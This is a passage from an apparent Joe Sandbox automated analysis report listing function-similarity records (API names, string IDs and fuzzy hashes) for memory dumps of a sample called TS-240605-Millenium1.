                                                                                          • API String ID: 2920928814-2573406579
                                                                                          • Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                          • Instruction ID: ef4bbb64a3c4736fd4f0dd39c9b8cf037bb395b633e35c2cc4e81876c2eb5a6d
                                                                                          • Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
                                                                                          • Instruction Fuzzy Hash: 9E215631A08A4281F7609F11E9442796375FF7A746F445135F6CDF66A4DF3CE1458700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3140674995-0
                                                                                          • Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                          • Instruction ID: 5637be56caeb381e4f07412b79ba7101719b6558e151d13e3b58271490399124
                                                                                          • Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
                                                                                          • Instruction Fuzzy Hash: DC313E72609A8186EB609F60E8443FD7374FBA5745F04403AEA8D97B99DF38D648CB10
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          • Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                          • Instruction ID: acb994ba58fc21f652debe7ea6addeff3c4692a9b82afec9a8ee3d9f6b6ed50a
                                                                                          • Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
                                                                                          • Instruction Fuzzy Hash: 92315E32608B8186EB60CF25E8812BE73B4FB99759F540136EA8D93B58EF38D555CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2227656907-0
                                                                                          • Opcode ID: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                                                          • Instruction ID: 6ce6702cdc9e642873ad9904c3cf1047a247b18862d8f1fa554f061aeac966fe
                                                                                          • Opcode Fuzzy Hash: b3715d4618dde4abce6a703dfc2b0a62f6c41887aa9418885becb382e3094c85
                                                                                          • Instruction Fuzzy Hash: A1B1D622B18A9641EE619F6196001B963B0EF66BE5F445533FECDA7B89DF3CE841D300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                          • Instruction ID: d159937443e00417c9626a17170f4fb63e99da4281bd446557b6e83bfad85088
                                                                                          • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                          • Instruction Fuzzy Hash: AE115122B14F028AEB00CF60E9452B933B4FB69B59F041E31EA6D97764DF7CE1548740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 1502251526-0
                                                                                          • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                          • Instruction ID: 63131bac5d9e93a880af3b84359398440c08202a144bb1f85ea126081af42d4f
                                                                                          • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                          • Instruction Fuzzy Hash: 8EC10472B186C687E724CF15A24467AB7A1F7A5785F048136EB8AA3B44DF3DE811CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                          • String ID:
                                                                                          • API String ID: 15204871-0
                                                                                          • Opcode ID: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                                                          • Instruction ID: 4ee925ed15110da44231ad9f4649ecd33fc76bccc91d5b769151dcd66536c7a9
                                                                                          • Opcode Fuzzy Hash: 107d115b060fbd35a116a220a90c3f58689526778be32960ff8b0eb29206904d
                                                                                          • Instruction Fuzzy Hash: 90B16973A04B898AEB15CF29C9863687BF0F755B48F158822EBAD937A4DF39D451C700
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $
                                                                                          • API String ID: 0-227171996
                                                                                          • Opcode ID: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
                                                                                          • Instruction ID: 23d4479a43e955f48a4ca7bbdf188cc20290b79a301d5fe5f23feccf4f1ce6d5
                                                                                          • Opcode Fuzzy Hash: a4155c6fffaecf52a824239c2b6f37dbc1b24f1087258a4a4fa2a9ab421e67c4
                                                                                          • Instruction Fuzzy Hash: 67E1CA3690868283EB688F15835217DB3B1FF67B49F241235EA8EA7794DF39E851C740
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: e+000$gfff
                                                                                          • API String ID: 0-3030954782
                                                                                          • Opcode ID: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
                                                                                          • Instruction ID: 9117c8426b81c7cabe5cd38bc9cd0f237ab76422c5b1d82577533818fd59dbe4
                                                                                          • Opcode Fuzzy Hash: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
                                                                                          • Instruction Fuzzy Hash: B1517A22B183D143E7208E35AA027796BA1E765B91F489233FBEC97AC5CF3DE4008700
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: gfffffff
                                                                                          • API String ID: 0-1523873471
                                                                                          • Opcode ID: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                                                          • Instruction ID: 374a372b1b2e75e32dfc40fe65340236dc6baf18dd20bb93389e7896514f460c
                                                                                          • Opcode Fuzzy Hash: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                                                          • Instruction Fuzzy Hash: 57A14562A087C687EB21CF25A5417B97BA1AB66B84F048132FBCD97781EE3DE501C701
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: TMP
                                                                                          • API String ID: 3215553584-3125297090
                                                                                          • Opcode ID: 78de1512b9aaf0fe835626b1baf1273ddb3abd7b45f485034b213d1c96ec7de6
                                                                                          • Instruction ID: b06e42ed6caa8caf37c8596f216bfe9f9bd036007b5fa13b3d35ec53dfa3e06e
                                                                                          • Opcode Fuzzy Hash: 78de1512b9aaf0fe835626b1baf1273ddb3abd7b45f485034b213d1c96ec7de6
                                                                                          • Instruction Fuzzy Hash: 8C51B615F0870792FA54AF269B0217A52B1AF76B86F085435FECDE77DAEE3CE4424200
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                                                          • Instruction ID: 7216a0146f8ffde7a57e77e6e7ed89b2c678b94441fa1d7f6e3c009b08c3a82e
                                                                                          • Opcode Fuzzy Hash: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                                                          • Instruction Fuzzy Hash: 09B09220E07A02C6FA082F116D8222422B87F69B12F944039D08DE1320DE2C20A58B01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                                                          • Instruction ID: eecf8469c0293f3f6d45a31a9f02222559afdb1def792c176e362cb6326df46b
                                                                                          • Opcode Fuzzy Hash: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                                                          • Instruction Fuzzy Hash: D5D1E826A0868387EB68CF25874223D67B0EF67B49F140235EE9DA7695CF3DE845C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                                                          • Instruction ID: 72be6be9f17d5c19523c0019396f2384ac28e63da828ecea776564cf7a8f77c4
                                                                                          • Opcode Fuzzy Hash: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                                                          • Instruction Fuzzy Hash: 93C1C4722141E14BD2C9EB29E56957A37E1FB9934EBC4403AEBCB47B8AC63CE014D710
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                                                          • Instruction ID: 676f0b6b05e2d7fbe08c026ac2b5bd895249b7e7749a8f6a6a342ac14ae637b5
                                                                                          • Opcode Fuzzy Hash: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                                                          • Instruction Fuzzy Hash: 1DB1AF72A0C7858AE7658F29C15113E3BB0EB26F49F244135EB9E97795CF39D841C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                                                          • Instruction ID: feb1359d92911b8514966b38d26d85064b8745c5ba81e97327f956dfb898bb09
                                                                                          • Opcode Fuzzy Hash: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                                                          • Instruction Fuzzy Hash: 1D81D572A0C78147E774CF19A6433B9A6A1FB56794F144235FACD93B99CE3CD4008B00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 56d2f3263a1741f87de1d3959ce665dc908e505345c087bc705cf795706c1100
                                                                                          • Instruction ID: 8aa820ac97cdc7256088a3eb6786d6180913187b08827cbf28d578e9276c517a
                                                                                          • Opcode Fuzzy Hash: 56d2f3263a1741f87de1d3959ce665dc908e505345c087bc705cf795706c1100
                                                                                          • Instruction Fuzzy Hash: EB612A22E183A246F7648E6C865427966B2AF62361F540A3AF7DDD76D4DE7CE900CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                                                          • Instruction ID: ac9164782f815f7dc46635b5ca3a4eb5a5da4fe224df42686c829db3aacad217
                                                                                          • Opcode Fuzzy Hash: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                                                          • Instruction Fuzzy Hash: 9F514F76A18A5187E7258F29C14623827B0FB66B69F244131EE8DA7795CF3AEC42C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                                                          • Instruction ID: 6c5eeeb50477ec2a82be9eef9dee7ec93ba55765db5187fddfa2bf4e83d5c90d
                                                                                          • Opcode Fuzzy Hash: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                                                          • Instruction Fuzzy Hash: 43516136A18E5187E7248F29C14523933B4EB66F69F244131EACDA7794DF3AE843D780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
